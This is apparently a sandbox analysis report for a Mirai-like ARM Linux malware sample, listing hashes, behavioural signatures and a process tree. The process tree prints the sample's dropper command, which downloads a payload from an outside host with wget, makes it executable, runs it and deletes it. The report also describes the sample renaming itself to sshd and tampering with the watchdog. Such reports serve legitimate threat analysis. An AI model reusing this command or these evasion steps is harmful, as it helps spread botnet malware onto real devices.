Analysis

max time kernel: 147s
max time network: 140s
platform: debian-9_armhf
resource: debian9-armhf-20231215-en
resource tags: arch:armhf, image:debian9-armhf-20231215-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 19/02/2024, 09:49
Behavioral task: behavioral1
Sample: 4d21edf2f074bb83a118e4321c912922.elf
Resource: debian9-armhf-20231215-en
General

Target: 4d21edf2f074bb83a118e4321c912922.elf
Size: 127KB
MD5: 4d21edf2f074bb83a118e4321c912922
SHA1: 7816908c6cf7c4c105338a097a84578602396f7b
SHA256: 19936aea14ea5d32bf54625c3a2e6d735e24b866ff33f76d3d654620ecb2f0fa
SHA512: 1da50741de1b474fa6e77cfc488976f9558650a4ff0be7a089dfb86138daabfa89f97b786b842418049b8a26ed95fbf7b52c04543c736939656d898d7590335a
SSDEEP: 3072:+DShVLkDZ6waCAdclEbYJOmP46aQyfPluesNb:VhVeZ6zclEboOmP46aQyfPluesNb
Malware Config
Signatures

Changes its process name (1 IoC)
  description: Changes the process name, possibly in an attempt to hide itself
  ioc: sshd
  pid: 656
  process: 4d21edf2f074bb83a118e4321c912922.elf

Executes dropped EXE (1 IoC)
  ioc: /tmp/.....
  pid: 673
  process: .....

Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description: File opened for modification; ioc: /dev/watchdog
  description: File opened for modification; ioc: /dev/misc/watchdog

Reads system routing table (1 TTP, 1 IoC)
  Gets active network interfaces from the /proc virtual filesystem.
  description: File opened for reading; ioc: /proc/net/route; process: 4d21edf2f074bb83a118e4321c912922.elf

Reads system network configuration (1 TTP, 1 IoC)
  Uses contents of the /proc filesystem to enumerate network settings.
  description: File opened for reading; ioc: /proc/net/route; process: 4d21edf2f074bb83a118e4321c912922.elf

Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  description: File opened for modification; ioc: /tmp/.....; process: wget
Processes

/tmp/4d21edf2f074bb83a118e4321c912922.elf (PID 656)
  command: /tmp/4d21edf2f074bb83a118e4321c912922.elf
  - Changes its process name
  - Reads system routing table
  - Reads system network configuration
  └ /bin/sh (PID 657)
      command: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      └ /usr/bin/wget (PID 661)
          command: wget -q http://gay.energy/.../vivid -O .....
          - Writes file to tmp directory
      └ /bin/chmod (PID 672)
          command: chmod 777 .....
      └ /tmp/..... (PID 673)
          command: ./.....
          - Executes dropped EXE
      └ /bin/sh (PID 673)
          command: /bin/sh ./.....
      └ /bin/rm (PID 675)
          command: rm -rf .....